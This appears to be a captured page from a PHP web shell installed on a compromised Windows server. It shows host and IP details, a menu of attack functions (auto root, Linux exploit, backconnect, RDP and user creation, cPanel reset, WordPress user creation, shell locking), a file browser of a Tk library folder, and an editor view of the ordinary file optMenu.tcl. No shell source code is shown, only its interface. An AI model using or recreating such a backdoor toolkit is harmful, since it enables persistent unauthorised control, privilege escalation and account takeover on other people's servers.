Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
laragon /
bin /
python /
python-3.10 /
tcl /
tk8.6 /
[ HOME SHELL ]
Name
Size
Permission
Action
demos
[ DIR ]
drwxrwxrwx
images
[ DIR ]
drwxrwxrwx
msgs
[ DIR ]
drwxrwxrwx
ttk
[ DIR ]
drwxrwxrwx
bgerror.tcl
8.6
KB
-rw-rw-rw-
button.tcl
21.11
KB
-rw-rw-rw-
choosedir.tcl
9.73
KB
-rw-rw-rw-
clrpick.tcl
21.59
KB
-rw-rw-rw-
comdlg.tcl
8.49
KB
-rw-rw-rw-
console.tcl
33.15
KB
-rw-rw-rw-
dialog.tcl
5.85
KB
-rw-rw-rw-
entry.tcl
17.97
KB
-rw-rw-rw-
focus.tcl
4.92
KB
-rw-rw-rw-
fontchooser.tcl
16.08
KB
-rw-rw-rw-
iconlist.tcl
17.01
KB
-rw-rw-rw-
icons.tcl
10.78
KB
-rw-rw-rw-
license.terms
2.25
KB
-rw-rw-rw-
listbox.tcl
14.9
KB
-rw-rw-rw-
megawidget.tcl
9.63
KB
-rw-rw-rw-
menu.tcl
38.57
KB
-rw-rw-rw-
mkpsenc.tcl
30.12
KB
-rw-rw-rw-
msgbox.tcl
16.39
KB
-rw-rw-rw-
obsolete.tcl
5.64
KB
-rw-rw-rw-
optMenu.tcl
1.59
KB
-rw-rw-rw-
palette.tcl
8.22
KB
-rw-rw-rw-
panedwindow.tcl
5.24
KB
-rw-rw-rw-
pkgIndex.tcl
376
B
-rw-rw-rw-
safetk.tcl
7.45
KB
-rw-rw-rw-
scale.tcl
7.87
KB
-rw-rw-rw-
scrlbar.tcl
12.88
KB
-rw-rw-rw-
spinbox.tcl
16.14
KB
-rw-rw-rw-
tclIndex
20.04
KB
-rw-rw-rw-
tearoff.tcl
5.18
KB
-rw-rw-rw-
text.tcl
34.14
KB
-rw-rw-rw-
tk.tcl
23.7
KB
-rw-rw-rw-
tkfbox.tcl
38.68
KB
-rw-rw-rw-
unsupported.tcl
10.27
KB
-rw-rw-rw-
xmfbox.tcl
26.43
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : optMenu.tcl
# optMenu.tcl -- # # This file defines the procedure tk_optionMenu, which creates # an option button and its associated menu. # # Copyright (c) 1994 The Regents of the University of California. # Copyright (c) 1994 Sun Microsystems, Inc. # # See the file "license.terms" for information on usage and redistribution # of this file, and for a DISCLAIMER OF ALL WARRANTIES. # # ::tk_optionMenu -- # This procedure creates an option button named $w and an associated # menu. Together they provide the functionality of Motif option menus: # they can be used to select one of many values, and the current value # appears in the global variable varName, as well as in the text of # the option menubutton. The name of the menu is returned as the # procedure's result, so that the caller can use it to change configuration # options on the menu or otherwise manipulate it. # # Arguments: # w - The name to use for the menubutton. # varName - Global variable to hold the currently selected value. # firstValue - First of legal values for option (must be >= 1). # args - Any number of additional values. proc ::tk_optionMenu {w varName firstValue args} { upvar #0 $varName var if {![info exists var]} { set var $firstValue } menubutton $w -textvariable $varName -indicatoron 1 -menu $w.menu \ -relief raised -highlightthickness 1 -anchor c \ -direction flush menu $w.menu -tearoff 0 $w.menu add radiobutton -label $firstValue -variable $varName foreach i $args { $w.menu add radiobutton -label $i -variable $varName } return $w.menu }
Close